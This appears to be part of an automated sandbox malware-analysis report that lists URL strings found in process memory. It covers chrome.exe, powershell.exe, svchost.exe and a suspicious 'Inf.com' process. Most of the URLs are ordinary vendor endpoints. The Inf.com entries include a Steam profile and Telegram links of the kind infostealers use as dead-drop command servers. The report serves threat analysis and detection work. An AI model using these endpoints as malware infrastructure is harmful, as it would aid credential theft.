Source: chrome.exe, 00000015.00000003.2538132137.0000392C003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2537018388.0000392C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000015.00000003.2531090286.00005BA0002EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2531069786.00005BA0002E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000015.00000003.2542264266.00000ED800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: Inf.com, 00000012.00000002.3025048546.0000000006C2B000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3022504782.0000000004CD1000.00000004.00000800.00020000.00000000.sdmp, WT2NOZ.18.dr	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: Inf.com, 00000012.00000002.3025048546.0000000006C2B000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3022504782.0000000004CD1000.00000004.00000800.00020000.00000000.sdmp, WT2NOZ.18.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: powershell.exe, 00000000.00000002.1966743727.000001D062BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1966743727.000001D062BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1966743727.000001D062BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: chrome.exe, 00000015.00000003.2595143418.00000ED801D1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
Source: chrome.exe, 00000015.00000003.2542264266.00000ED800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
Source: chrome.exe, 00000015.00000003.2542264266.00000ED800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-autopush.corp.google.com/
Source: chrome.exe, 00000015.00000003.2542264266.00000ED800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: chrome.exe, 00000015.00000003.2542264266.00000ED800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: chrome.exe, 00000015.00000003.2542264266.00000ED800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: chrome.exe, 00000015.00000003.2542264266.00000ED800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: chrome.exe, 00000015.00000003.2542264266.00000ED800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: chrome.exe, 00000015.00000003.2542264266.00000ED800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: chrome.exe, 00000015.00000003.2542264266.00000ED800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: chrome.exe, 00000015.00000003.2542264266.00000ED800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-preprod.corp.google.com/
Source: chrome.exe, 00000015.00000003.2542264266.00000ED800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-staging.corp.google.com/
Source: chrome.exe, 00000015.00000003.2556074286.00000ED8010C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
Source: chrome.exe, 00000015.00000003.2542264266.00000ED800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: chrome.exe, 00000015.00000003.2593082155.00000ED800C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2599700581.00000ED800C34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: svchost.exe, 00000016.00000003.2541509841.0000028F60102000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.22.dr, edb.log.22.dr	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.22.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.22.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.22.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000016.00000003.2541509841.0000028F60102000.00000004.00000800.00020000.00000000.sdmp, edb.log.22.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000000.00000002.1942637880.000001D052D98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 00000015.00000003.2538132137.0000392C003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2537018388.0000392C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/C
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/F
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/M
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/P
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Q
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/T
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/W
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Z
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/a
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/d
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/e
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/h
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/k
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/n
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/r
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/u
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/x
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/y
Source: chrome.exe, 00000015.00000003.2538530355.0000392C00694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000015.00000003.2538132137.0000392C003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2537018388.0000392C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 00000015.00000003.2538530355.0000392C00694000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/9
Source: chrome.exe, 00000015.00000003.2538530355.0000392C00694000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
Source: chrome.exe, 00000015.00000003.2538530355.0000392C00694000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs27
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs2e
Source: WT2NOZ.18.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/161903006
Source: chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/166809097
Source: chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/184850002
Source: chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/187425444
Source: chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/220069903
Source: chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/229267970
Source: chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/250706693
Source: chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/253522366
Source: chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/255411748
Source: chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/258207403
Source: chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/274859104
Source: chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/284462263
Source: chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 00000015.00000003.2537018388.0000392C003A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 00000015.00000003.2584084846.00000ED802D90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 00000015.00000003.2538132137.0000392C003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2537018388.0000392C003A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 00000015.00000003.2538132137.0000392C003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2537018388.0000392C003A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 00000015.00000003.2537018388.0000392C003A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 00000015.00000003.2596195396.00000ED803028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2596141624.00000ED80300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2595487527.00000ED802FA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2596235017.00000ED801C14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search?source=ntp
Source: chrome.exe, 00000015.00000003.2556148842.00000ED80120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2555932355.00000ED8003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2556074286.00000ED8010C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/upload
Source: chrome.exe, 00000015.00000003.2556148842.00000ED80120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2555932355.00000ED8003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2556074286.00000ED8010C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/uploadbyurl
Source: chrome.exe, 00000015.00000003.2538132137.0000392C003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2537018388.0000392C003A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/2
Source: chrome.exe, 00000015.00000003.2538814022.0000392C006F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 00000015.00000003.2537018388.0000392C003A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
Source: powershell.exe, 00000000.00000002.1984512408.000001D06B46D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: chrome.exe, 00000015.00000003.2575369578.00000ED800C30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=ee272b19-4411-433f-8f28-5c1
Source: chrome.exe, 00000015.00000003.2540616101.00000ED8001C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 00000015.00000003.2596195396.00000ED803028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2596141624.00000ED80300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2595487527.00000ED802FA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2596235017.00000ED801C14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?tab=rm&ogbl
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-email2B
Source: chrome.exe, 00000015.00000003.2577020384.00000ED80106C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: powershell.exe, 00000000.00000002.1966743727.000001D062BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: chrome.exe, 00000015.00000003.2595764404.00000ED803044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2595394676.00000ED8030C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2595463775.00000ED8030D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2596235017.00000ED801C14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogads-pa.googleapis.com
Source: chrome.exe, 00000015.00000003.2599700581.00000ED800C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2599700581.00000ED800C34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 00000015.00000003.2595764404.00000ED803044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2595394676.00000ED8030C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2595463775.00000ED8030D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2596235017.00000ED801C14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chrome.exe, 00000015.00000003.2595764404.00000ED803044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2595394676.00000ED8030C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2595463775.00000ED8030D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2596235017.00000ED801C14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: svchost.exe, 00000016.00000003.2541509841.0000028F60102000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.22.dr, edb.log.22.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.22.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: chrome.exe, 00000015.00000003.2556148842.00000ED80120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2555932355.00000ED8003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2556074286.00000ED8010C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.com2
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.comJv
Source: chrome.exe, 00000015.00000003.2573874031.00000ED800294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: chrome.exe, 00000015.00000003.2596195396.00000ED803028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2596141624.00000ED80300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2595487527.00000ED802FA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2596235017.00000ED801C14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
Source: Inf.com, 00000012.00000003.2351615242.00000000019D9000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3021593436.0000000001A33000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351564901.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351446315.0000000004BF1000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351511068.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351416495.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3022504782.0000000004BF0000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3019523263.0000000000391000.00000040.00001000.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351644907.0000000001A58000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3021593436.0000000001960000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199809363512
Source: Inf.com, 00000012.00000002.3021593436.0000000001960000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.0
Source: Inf.com, 00000012.00000002.3025565970.0000000006F07000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Inf.com, 00000012.00000002.3025565970.0000000006F07000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Inf.com, 00000012.00000002.3022504782.0000000004C78000.00000004.00000800.00020000.00000000.sdmp, OZ5XT2.18.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Inf.com, 00000012.00000002.3022504782.0000000004C53000.00000004.00000800.00020000.00000000.sdmp, OZ5XT2.18.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Inf.com, 00000012.00000002.3022504782.0000000004C78000.00000004.00000800.00020000.00000000.sdmp, OZ5XT2.18.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: Inf.com, 00000012.00000002.3022504782.0000000004C53000.00000004.00000800.00020000.00000000.sdmp, OZ5XT2.18.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Inf.com, 00000012.00000003.2351468070.0000000001A78000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351615242.00000000019D9000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351564901.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351283097.0000000001A4B000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351564901.0000000001A78000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351338086.00000000019D9000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351316659.0000000001A90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.m
Source: Inf.com, 00000012.00000002.3021428443.00000000018FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: Inf.com, 00000012.00000003.2351468070.0000000001A78000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351615242.00000000019D9000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351564901.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351283097.0000000001A4B000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351564901.0000000001A78000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351338086.00000000019D9000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351316659.0000000001A90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/k04
